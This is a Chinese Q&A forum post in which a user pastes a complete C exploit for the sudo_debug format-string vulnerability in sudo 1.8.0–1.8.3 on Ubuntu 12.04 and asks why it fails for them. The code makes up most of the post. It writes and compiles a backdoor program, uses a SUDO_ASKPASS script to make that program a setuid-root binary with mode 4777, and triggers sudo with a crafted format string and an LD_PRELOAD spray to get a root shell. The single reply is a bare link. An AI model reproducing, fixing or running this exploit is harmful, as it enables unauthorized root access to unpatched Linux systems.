请教一个在Linux Ubuntu12.04下通过sudo_debug函数的格式化字符串漏洞来获取root权限的问题

我于网上抄了一个大佬的代码，源码地址

代码如下：

#include <sys/resource.h>
#include <sys/utsname.h>
#include <gnu/libc-version.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/wait.h>

#define OFFSET       65000
#define NUM_THREADS  0

/* files that we create on disk */
#define BACKDOOR     "e.c"
#define BD_COMPILED  "e"
#define SUDO_ASKPASS "e.sh"

extern char **environ;
struct utsname ver;

void *kill_sudo();
void *pop_shell();
void *set_env();
int is_glibc_vuln();
int is_sudo_vuln();
int write_backdoor();

/* hardcoded path to sudo */
const char sudo[] = "/usr/bin/sudo\0";
char s_version[20];

/* vuln versions of sudo */
char vuln_sudo_versions[4][20] = {
    {"1.8.0"},
    {"1.8.1"},
    {"1.8.2"},
    {"1.8.3"}
};

/* vuln versions of glibc */
char vuln_glibc_versions[4][20] = {
    {"2.14.90"},
};

int main(int argc, char *argv[])
{
    struct rlimit rara;
    int status;
    char ready;
    uname(&ver);
    printf("[+] Targeting release: %s\n", ver.release);
    if (is_glibc_vuln()){
        if(is_sudo_vuln()){
            if (write_backdoor()){
                printf("[+] Press enter when ready...");
                scanf("%c", &ready);
            }else{ exit(0); }
        }else{ exit(0); }
    }else{ exit(0); }

    // ulimited stack
    rara.rlim_max = rara.rlim_cur = -1;
    setrlimit(RLIMIT_STACK, &rara);

    pid_t pid;
    if((pid = fork()) < 0)
    {
        printf("[-] An error occurred while forking sudo\n");
        return -1;
    }
    else if(pid == 0){
        set_env();
        kill_sudo();
    }else{
        wait(&status);
        if (WIFEXITED(status)) {
            sleep(1);
            pop_shell();
        }
    }
}

int is_glibc_vuln(){
    int i, returnval = -1;
    for (i = 0; i < 4; i++){
        if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){
            printf("[+] Found vuln glibc version: %s\n", gnu_get_libc_version());
            returnval = 1;
        }
    }
    return returnval;
};

int is_sudo_vuln(){
    int i, returnval = -1;;
    FILE *fp;
    char path[20];
    char sudo_ver_cmd[50];
    snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo);
    fp = popen(sudo_ver_cmd, "r");

    if (fp == NULL) {
        printf("[-] Failed to get sudo's version\n[-]Exiting.." );
        exit(0);
    }
    fgets(path, 21, fp);
    memmove (s_version, path+13,5);
    for (i = 0; i < 4; i++){
        if (strcmp(s_version, vuln_sudo_versions[i]) == 0){
            printf("[+] Found a vuln sudo version: %s\n", s_version);
            returnval = 1;
        }
    }
    return returnval;
};

int write_backdoor(){
    int returnval = 1;
    char askpass[100], compile_bd[100];
    char bdcode[] = "#include <stdio.h>\r\n"
                    "#include <stdlib.h>\r\n"
                    "int main(int argc, char **argv){\r\n"
                    "    printf(\"[+] Getting root..!\\n\");\r\n"
                    "    setresuid(0,0,0);\r\n"
                    "    printf(\"[+] Cleaning system.\\n\");\r\n"
                    "    remove(\"e\"); remove(\"e.c\"); remove(\"e.sh\");\r\n"
                    "    printf(\"[+] Launching root shell!\\n\");\r\n"
                    "    system(\"/bin/sh\");\r\n"
                    "    exit(0);\r\n"
                    "}\r\n";

    FILE *fp = fopen(BACKDOOR,"wb");
    if (fp == NULL) {
        printf("[-] Failed to write backdoor on the target, check your permissions\n" );
        returnval = -1;
    }else{
        printf("[+] Writing backdoor: %s\n", BACKDOOR);
    }

    fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);
    memset(compile_bd, 0x00, sizeof(compile_bd));
    snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED);
    printf("[+] Compiling backdoor: %s\n", BD_COMPILED);
    fp = popen(compile_bd, "r");

    if (fp == NULL) {
        printf("[-] Failed to compile the backdoor, check the gcc path\n" );
        returnval = -1;
    }

    fclose(fp);
    memset(askpass, 0x00, sizeof(askpass));
    snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\nchown root:root %s\nchmod 4777 %s\n", BD_COMPILED, BD_COMPILED);
    fp = fopen(SUDO_ASKPASS,"w");

    if (fp == NULL) {
        printf("[-] Failed to write backdoor on the target, check your permissions\n" );
        returnval = -1;
    }else{
        printf("[+] Writing SUDO_ASKPASS file: %s\n", SUDO_ASKPASS);
    }

    fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);
    chmod(SUDO_ASKPASS, 0755);
    return returnval;
};

void *set_env(){
    int i = 0;
    char ld_preload_evar[OFFSET] = "LD_PRELOAD=";
    char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};
    char sudo_askpass_evar[40];
    for (i=0; i<(OFFSET/4); i++){
        memcpy(user_details+(i*4), user_details, sizeof(int));
    }

    memmove (ld_preload_evar+11, user_details , sizeof(user_details));
    memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));
    snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS);

    // set our environment
    putenv(ld_preload_evar);
    putenv(sudo_askpass_evar);
};

void *kill_sudo(){
    char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$";
    char *args[] = { fmtstring, "-D9", "-A", "", NULL};

    // trigger the vuln
    execve(sudo, args, environ);
};

void *pop_shell(){
    // set our environment
    unsetenv("LD_PRELOAD");
    unsetenv("SUDO_ASKPASS");
    char *exploit_args[] = { BD_COMPILED, NULL };
    execve(BD_COMPILED, exploit_args, environ);
};

这是别人运行后的截图
图片说明
这是我运行的截图

可以看出来我的没有运行成功，我是自己复制下来的，完全没有改动，sudo版本也是相同的，我实在是不知道原因何在，只能来求助各位大佬了

写回答
好问题 0 提建议
追加酬金
关注问题
分享
邀请回答
编辑收藏删除
收藏举报

1条回答默认最新

关注

码龄粉丝数原力等级 --

被采纳

被点赞

采纳率
dabocaiqq 2019-12-28 00:28
关注
https://www.cnblogs.com/sky-heaven/p/12059433.html

解决无用
评论打赏
分享
举报

评论

按下Enter换行，Ctrl+Enter发表内容

报告相同问题？

关注问题

Ubuntu12.04平台安装 ROS问题 c语言 ubuntu 有问必答
2021-05-02 22:54

回答 4 已采纳是不是虚拟机平台上的网络没有设置好哦，导致不能联网。
ubuntu12.04无法root登录 ubuntu
2017-08-14 16:26

回答 1 已采纳是登录的时候不能以root方式登录还是你设置了显示还是以guest登录，root需要你重新输入root用户和password登录
使用XAMPP服务器在ubuntu 12.04 LTS上安装Phalcon linux php
2014-02-10 20:20

回答 3 已采纳 Probably version or configuration difference between your machine's PHP and XAMPP's PHP If you a
Linux安装supervisor:一个进程控制系统
2020-05-16 21:33

LifeIsForSharing的博客这个键设置的值是3，然后在supervisord.log的输出日志上Elasticsearch启动成功后3s时间supervisord就以为Elasticsearch启动成功了，结果后面遇到了文件描述符数和线程数不够的问题。另外，这里的优先级priority=998...
关于在ubuntu12.04上安装sun grid engine的问题 ubuntu
2013-10-13 06:27

回答 1 已采纳 [http://blog.chinaunix.net/uid-758327-id-12298.html]( "")
在Ubuntu 12.04上PHP从5.3升级到php 5.6 apache php ubuntu
2015-06-11 09:04

回答 4 已采纳 sudo LC_ALL=C.UTF-8 add-apt-repository ppa:ondrej/php sudo apt-get update sudo apt-get install php
在Ubuntu Server 12.04上设置Web应用程序会导致内部服务器错误 php ubuntu
2013-08-01 17:11

回答 1 已采纳 Your rewrite engine isn't enabled. Go to shell and do the following: a2enmod rewrite service apac
zynq-linux的相关脚本分析
2021-10-23 13:52

簌簌紫棠飞白鹭的博客米联客公司提供的zynq-linux的相关脚本分析，欢迎讨论。一.全局重要的两个sh文件 settings64.sh usage() { echo "Purpose: To configure the developing environment automatically" echo "Version: V2018.06" ...
PHPMYADMIN未在Ubuntu12.04中加载 php ubuntu
2013-09-27 05:31

回答 2 已采纳 You're missing PHP. From the terminal: sudo apt-get install php5 php5-mysql Then restart Apache
使用UBUNTU 12.04和Oracle的GO上的错误字符 oracle
2014-06-12 15:08

回答 1 已采纳 This problem had been solved converting the values into hexadecimal using the follow query selec
服务器安装 ubuntu server12.04 linux
2012-06-26 09:53

回答 2 已采纳个么不要加密啊。。。分区可以选整个磁盘好了，自动分区的，或者手动自己配置LVM分区。。。。 http://forum.ubuntu.org.cn/viewtopic.php?t=39777
Monitor模式和AP模式下获取WiFi的CSI信号
2018-10-21 13:06

山人自有锦囊妙计的博客目的：基于WiFi信号的呼吸和心率检测说明： 1、自己的一点实践记录，可能有很多地方写的不好或者不对，望指正 ...是衡量信道情况的信道状态信息（Channel State Information）,属于PHY层，来自OFDM系统下解码...
如何在ubuntu 12.04中安装PNGOUT压缩 php
2014-04-09 13:53

回答 1 已采纳 You can install pngout by installing the binary . Currently there isn't any deb file for debian/ub
java工程师linux命令，这篇文章就够了
2018-08-14 19:47

hello-java-maker的博客察看当前系统下有哪些shell： cat /etc/shells 察看当前系统正在使用的shell echo $SHELL 常见shell： /bin/sh (已经被 /bin/bash 所取代) /bin/bash (就是 Linux 默认的 shell) /bin/ksh...
Ubuntu上搭建Android编译环境（1）
2018-07-25 15:04

高精度计算机视觉的博客外网信号不好，所以把google的原文介绍扒到这里来参考。 https://source.android.com/setup/ Android 源代码 Android 是一个针对多种不同设备类型打造的开放源代码软件堆栈。Android 的主要目的是为运营商、原始...
ubuntu常用系统命令
2019-01-09 18:17

weixin_30947043的博客如果不安装这个软件包，必须使用root权限写fat格式的磁盘。而且速度很慢。安装这个软件包后，可以用一般用户写fat格式磁盘，速度恢复正常。我曾经写fat格式的U盘速度非常慢，只有几百KB/s。安装这个软件包后...
Ubuntu命令参考手册
2016-09-29 23:17

Android系统攻城狮的博客 HomeExcel的数据类型转换方法Git超级简明手册Ubuntu命令参考手册修改、重新生成和安装srpm源码包及deb包的方法在linux上用dd命令实现ghost功能最简单实现跨域的方法使用nginx反向代理构建自己的debian软件包仓库...
Ubuntu命令
2014-11-15 22:12

huof的博客本文包括两个部分，第一部分是Ubuntu官网的Ubuntu命令技巧。我添加、修改和补充了其中部分内容。第二部分是我在Ubuntu上经常使用的其他常用命令。会随时更新，以备大家查询。 Linux下常用的一些...
Docker笔记
2022-04-06 15:56

陳騰飛的博客公司要弄一个活动，可能会有大量的流量进来，公司需要再多部署几十台服务器 在没有Docker的情况下，要在几天内部署几十台服务器，这对运维来说是一件非常折磨人的事，而且每台服务器的环境还不一定一样，就会出现...
没有解决我的问题, 去提问

悬赏问题

¥15 YoloV5 第三方库的版本对照问题
¥15 请完成下列相关问题！
¥15 drone 推送镜像时候 purge: true 推送完毕后没有删除对应的镜像,手动拷贝到服务器执行结果正确在样才能让指令自动执行成功删除对应镜像，如何解决？
¥15 求daily translation（DT）偏差订正方法的代码
¥15 js调用html页面需要隐藏某个按钮
¥15 ads仿真结果在圆图上是怎么读数的
¥20 Cotex M3的调试和程序执行方式是什么样的？
¥20 java项目连接sqlserver时报ssl相关错误
¥15 一道python难题3
¥15 牛顿斯科特系数表表示

请教一个在Linux Ubuntu12.04下通过sudo_debug函数的格式化字符串漏洞来获取root权限的问题

1条回答 默认 最新

悬赏问题

1条回答默认最新